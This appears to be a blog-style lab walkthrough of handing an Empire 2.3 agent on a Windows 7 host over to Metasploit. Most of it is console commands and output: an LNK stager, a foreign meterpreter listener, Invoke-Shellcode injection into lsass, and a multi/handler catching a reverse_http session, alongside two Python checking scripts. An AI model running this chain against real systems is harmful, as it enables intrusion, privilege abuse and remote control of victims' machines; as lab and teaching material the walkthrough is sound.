EMPIRE 2 metasploit

After getting in with EMPIRE, I want to move from the PC that holds the session on to the server.
In reality you would grind it out with keyloggers and the like, but for a demo, hitting a vulnerability and getting straight in looks better.

The question is whether the tooling will actually run on the compromised Windows PC.
To widen the range of tools available, I tried verifying that EMPIRE can hand the baton over to metasploit.

The gotcha was the metasploit version.
On 4.16.13 the session died the instant it was handed over; upgrading to 4.16.26 fixed it.
For reference, the EMPIRE version is 2.3.

First, establish a session with EMPIRE as usual.

(Empire: listeners) > (Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: clickme.lnk

(Empire: stager/windows/launcher_lnk) > [+] Initial agent 4SVP6M9W from 10.0.2.5 now active (Slack)

(Empire: stager/windows/launcher_lnk) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  4SVP6M9W        ps    10.0.2.5        OSAKANA         *osakana\n-lab     powershell/2800     5/0.0    2018-01-20 11:47:28

(Empire: agents) > rename 4SVP6M9W WIN7
(Empire: agents) > interact WIN7
(Empire: WIN7) > back

Next, create one more listener. I'll call it "change-metasp".

This listener is of type meterpreter, a "foreign" listener: Empire does not serve anything on it itself, it only records where the Metasploit handler will be (the Host option, which defaults to http://<Empire host>:<Port>) so the agent can be tossed over to meterpreter.

(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > set Name change-metasp
(Empire: listeners/meterpreter) > set Port 8000
(Empire: listeners/meterpreter) > info

    Name: Meterpreter
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a 'foreign' http[s] Meterpreter listener.

Meterpreter Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  Host              True        http://10.0.2.15:8000            Hostname/IP for staging.
  Name              True        change-metasp                    Name for the listener.
  Port              True        8000                             Port for the listener.


(Empire: listeners/meterpreter) > execute
[*] Starting listener 'change-metasp'
[+] Listener successfully started!

Next, pick the process that meterpreter will be injected into.

(Empire: listeners/http) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  A21TR6ZE        ps    10.0.2.5        OSAKANA        *osakana\n-lab       powershell/1068     5/0.0    2018-01-19 21:46:08

(Empire: agents) > interact A21TR6ZE
(Empire: A21TR6ZE) > getpid
(Empire: A21TR6ZE) > 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName          
-------  ------    -----      -----     ------     --  -- -----------          
    379      32    59524      69324       4.02   1068   1 powershell

(Empire: A21TR6ZE) > ps
(Empire: A21TR6ZE) > 
ProcessName  PID Arch UserName                     MemUsage
-----------  --- ---- --------                     --------
Idle           0 x64  N/A                          0.02 MB 
System         4 x64  N/A                          0.74 MB 
smss         256 x64  NT AUTHORITY\SYSTEM          1.05 MB 
svchost      276 x64  NT AUTHORITY\LOCAL SERVICE   14.74 MB
csrss        332 x64  NT AUTHORITY\SYSTEM          5.45 MB 
csrss        368 x64  NT AUTHORITY\SYSTEM          12.19 MB
wininit      376 x64  NT AUTHORITY\SYSTEM          5.49 MB 
winlogon     404 x64  NT AUTHORITY\SYSTEM          7.71 MB 
services     464 x64  NT AUTHORITY\SYSTEM          8.77 MB 
lsass        472 x64  NT AUTHORITY\SYSTEM          10.38 MB
svchost      476 x64  NT AUTHORITY\NETWORK SERVICE 15.84 MB
powershell  1068 x64  osakana\n-lab                71.18 MB


(Empire: A21TR6ZE) > injectshellcode change-metasp 472
(Empire: powershell/code_execution/invoke_shellcode) > 

The module info now shows the setup: the "change-metasp" listener's shellcode will be injected into process 472. Note that 472 is lsass (SYSTEM, x64): if the injected shellcode crashes it, Windows takes the whole box down, and, as the module description below says, the shellcode (and therefore the handler's payload) has to match the architecture of the process you inject into.

(Empire: powershell/code_execution/invoke_shellcode) > info

              Name: Invoke-Shellcode
            Module: powershell/code_execution/invoke_shellcode
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None

Authors:
  @mattifestation

Description:
  Uses PowerSploit's Invoke--Shellcode to inject shellcode
  into the process ID of your choosing or within the context
  of the running PowerShell process. If you're injecting
  custom shellcode, make sure it's in the correct format and
  matches the architecture of the process you're injecting
  into.

Comments:
  http://www.exploit-monday.com https://github.com/mattifestat
  ion/PowerSploit/blob/master/CodeExecution/Invoke-
  Shellcode.ps1

Options:

  Name      Required    Value                     Description
  ----      --------    -------                   -----------
  ProcessID False       472                       Process ID of the process you want to   
                                                  inject shellcode into.                  
  Lhost     False                                 Local host handler for the meterpreter  
                                                  shell.                                  
  Agent     True        WIN7                      Agent to run module on.                 
  Listener  False       change-metasp             Meterpreter/Beacon listener name.       
  Lport     False                                 Local port of the host handler.         
  Shellcode False                                 Custom shellcode to inject,             
                                                  0xaa,0xab,... format.                   
  Payload   False       reverse_https             Metasploit payload to inject            
                                                  (reverse_http[s]).                      

(Empire: powershell/code_execution/invoke_shellcode) > set Payload reverse_http

Only the payload is changed, to reverse_http. Metasploit will run on the same machine as Empire, so Lhost and Lport are left empty; the module takes the host and port from the change-metasp listener (http://10.0.2.15:8000).
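Before running injectshellcode it is worth checking the target against the agent's own ps listing. The following is an added example, not Empire's code: it parses the ps table shown above (re-typed as constructed sample input), refuses processes whose crash would take the host down, and checks that the process architecture matches the Metasploit payload the handler will be started with (windows/x64/meterpreter/... for an x64 process). The CRITICAL set and the agent user passed to candidates() are assumptions for this demo, not Empire settings.

```python
"""
Added example (not Empire code): pre-flight check for `injectshellcode`.

Parses the agent's `ps` table, rejects critical processes, and verifies the
target architecture against the Metasploit payload name the handler will use.
"""
import re

# Constructed sample: the `ps` output of the agent as printed on this page.
PS_OUTPUT = """\
ProcessName  PID Arch UserName                     MemUsage
-----------  --- ---- --------                     --------
Idle           0 x64  N/A                          0.02 MB
System         4 x64  N/A                          0.74 MB
smss         256 x64  NT AUTHORITY\\SYSTEM          1.05 MB
svchost      276 x64  NT AUTHORITY\\LOCAL SERVICE   14.74 MB
csrss        332 x64  NT AUTHORITY\\SYSTEM          5.45 MB
wininit      376 x64  NT AUTHORITY\\SYSTEM          5.49 MB
lsass        472 x64  NT AUTHORITY\\SYSTEM          10.38 MB
svchost      476 x64  NT AUTHORITY\\NETWORK SERVICE 15.84 MB
powershell  1068 x64  osakana\\n-lab                71.18 MB
"""

# Assumption for the demo: processes whose death means a bugcheck or reboot
# (lsass, csrss, wininit, ...) or that cannot be injected into at all (Idle,
# System). Never demo targets.
CRITICAL = {"Idle", "System", "smss", "csrss", "wininit", "winlogon",
            "services", "lsass"}

_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(x86|x64)\s+(.+?)\s+([\d.]+ MB)\s*$")


def parse_ps(text):
    """Turn the Empire `ps` table into a list of dicts; header rows are skipped."""
    procs = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            procs.append({"name": m.group(1), "pid": int(m.group(2)),
                          "arch": m.group(3), "user": m.group(4).strip()})
    return procs


def payload_arch(payload):
    """Metasploit names x64 Windows payloads windows/x64/...; the rest are x86."""
    return "x64" if payload.startswith("windows/x64/") else "x86"


def check_target(procs, pid, payload):
    """Return (ok, reason) for injecting `payload`'s shellcode into `pid`."""
    proc = next((p for p in procs if p["pid"] == pid), None)
    if proc is None:
        return False, f"pid {pid} not in process list"
    if proc["name"] in CRITICAL:
        return False, f"{proc['name']} ({pid}) is a critical process; a crash takes the host down"
    want = payload_arch(payload)
    if proc["arch"] != want:
        return False, f"{proc['name']} ({pid}) is {proc['arch']} but {payload} is {want}"
    return True, f"{proc['name']} ({pid}) {proc['arch']} as {proc['user']}"


def candidates(procs, agent_user):
    """PIDs reachable without crossing a privilege boundary: same user, not critical."""
    return [p["pid"] for p in procs
            if p["user"].lower() == agent_user.lower() and p["name"] not in CRITICAL]


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    # What the check says about the page's choice (472 with an x86 reverse_http handler)
    print(check_target(procs, 472, "windows/meterpreter/reverse_http"))
    print(check_target(procs, 1068, "windows/x64/meterpreter/reverse_http"))
    print(candidates(procs, "osakana\\n-lab"))
```

For the listing above this leaves exactly one candidate, the agent's own powershell process (1068); leaving ProcessID empty in the module injects there anyway, which is the safest choice for a demo.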


Next, the metasploit side.

msf > use exploit/multi/handler
msf exploit(handler) > set paylad windows/meterpreter/reverse_http
paylad => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(handler) > set LPORT 8000
LPORT => 8000
msf exploit(handler) > setg exitonsession false
exitonsession => false
msf exploit(handler) > set

Global
======

  Name           Value
  ----           -----
  exitonsession  false

Module: multi/handler
=====================

  Name                    Value
  ----                    -----
  ContextInformationFile  
  DisablePayloadHandler   false
  EnableContextEncoding   false
  ExitOnSession           false
  LHOST                   10.0.2.15
  LPORT                   8000
  ListenerTimeout         0
  VERBOSE                 false
  WORKSPACE               
  paylad                  windows/meterpreter/reverse_http

msf exploit(handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.2.15:8000
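The handler has to match what Empire will inject: same transport (reverse_http for an http:// listener), same host and port as the listener's Host option, and the PAYLOAD option actually set. As an added example (not Metasploit or Empire code), the script below derives the multi/handler resource script from the Empire listener URL and sanity-checks a pasted `set` dump before `exploit -j`; run against the dump above it flags the `paylad` typo, which is why the job reported a reverse TCP handler instead of the HTTP one. LISTENER_HOST and SET_DUMP are constructed from this page; KNOWN_OPTIONS is the option list printed by `set` here plus PAYLOAD.

```python
"""
Added example (not Metasploit or Empire code): build the multi/handler resource
script for an Empire `meterpreter` listener and check a `set` dump against it.
"""
import difflib
import re
from urllib.parse import urlparse

# From the listener's `info` output on this page (Host option).
LISTENER_HOST = "http://10.0.2.15:8000"

# Constructed sample: the "Module: multi/handler" part of the `set` dump above,
# typo included on purpose.
SET_DUMP = """\
Module: multi/handler
=====================

  Name                    Value
  ----                    -----
  ContextInformationFile
  DisablePayloadHandler   false
  EnableContextEncoding   false
  ExitOnSession           false
  LHOST                   10.0.2.15
  LPORT                   8000
  ListenerTimeout         0
  VERBOSE                 false
  WORKSPACE
  paylad                  windows/meterpreter/reverse_http
"""

# Options `set` printed for multi/handler on this page, plus PAYLOAD (compared
# case-insensitively, as the msf datastore is).
KNOWN_OPTIONS = {"CONTEXTINFORMATIONFILE", "DISABLEPAYLOADHANDLER",
                 "ENABLECONTEXTENCODING", "EXITONSESSION", "LHOST", "LPORT",
                 "LISTENERTIMEOUT", "VERBOSE", "WORKSPACE", "PAYLOAD"}


def handler_rc(listener_host, arch="x86"):
    """msfconsole resource script matching an Empire meterpreter listener URL."""
    u = urlparse(listener_host)
    if u.scheme not in ("http", "https"):
        raise ValueError(f"unsupported listener scheme: {u.scheme!r}")
    payload = f"windows/{'x64/' if arch == 'x64' else ''}meterpreter/reverse_{u.scheme}"
    port = u.port or (443 if u.scheme == "https" else 80)
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {u.hostname}",
        f"set LPORT {port}",
        "set ExitOnSession false",   # keep the handler up for further sessions
        "exploit -j -z",
    ]) + "\n"


def parse_set_dump(text):
    """Name -> value for the option rows of a `set` dump (headers and rules skipped)."""
    opts = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s*(.*?)\s*$", line)
        if m and m.group(1) != "Name" and not m.group(1).startswith("-"):
            opts[m.group(1)] = m.group(2)
    return opts


def check_handler(opts, listener_host):
    """List everything that would make this handler not match Empire's injection."""
    u = urlparse(listener_host)
    problems = []
    upper = {k.upper(): v for k, v in opts.items()}
    for k in opts:
        if k.upper() not in KNOWN_OPTIONS:
            hint = difflib.get_close_matches(k.upper(), KNOWN_OPTIONS, n=1)
            problems.append(f"unknown option {k!r}"
                            + (f" (did you mean {hint[0]}?)" if hint else ""))
    payload = upper.get("PAYLOAD", "")
    if not payload:
        problems.append("PAYLOAD not set; the job will start with the default handler")
    elif not payload.endswith(f"reverse_{u.scheme}"):
        problems.append(f"{payload} does not match listener transport {u.scheme}")
    if upper.get("LHOST") != u.hostname:
        problems.append(f"LHOST {upper.get('LHOST')!r} != listener host {u.hostname!r}")
    if upper.get("LPORT") != str(u.port):
        problems.append(f"LPORT {upper.get('LPORT')!r} != listener port {u.port}")
    return problems


if __name__ == "__main__":
    print(handler_rc(LISTENER_HOST))
    for p in check_handler(parse_set_dump(SET_DUMP), LISTENER_HOST):
        print("!", p)
```

Save the output of handler_rc() as handler.rc and start it with `msfconsole -r handler.rc`; the job should then report an HTTP handler on http://10.0.2.15:8000 rather than "reverse TCP handler".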

Back in EMPIRE, execute. (One thing to check first: the handler above was configured with `set paylad ...`, a typo, so the PAYLOAD option never took effect, which is why the job reported "Started reverse TCP handler". Use `set PAYLOAD windows/meterpreter/reverse_http` and confirm the job announces an HTTP handler on http://10.0.2.15:8000 before handing the session over.)

(Empire: powershell/code_execution/invoke_shellcode) > execute 
Job started: 9C81LK

A session then comes up in metasploit.

msf exploit(multi/handler) > [*] http://10.0.2.15:8000 handling request from 10.0.2.5; (UUID: 67ehyyi0) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (10.0.2.15:8000 -> 10.0.2.5:49375) at 2018-01-20 13:49:34 +0900
sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               10.0.2.15:8000 -> 10.0.2.5:49375 (10.0.2.5)

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo

But then it complains that it has no idea what sysinfo is... why...
(sysinfo lives in meterpreter's stdapi extension; the empty Information column in the `sessions` listing above means stdapi was never loaded into this session. `load stdapi` at the meterpreter prompt is the first thing to try.)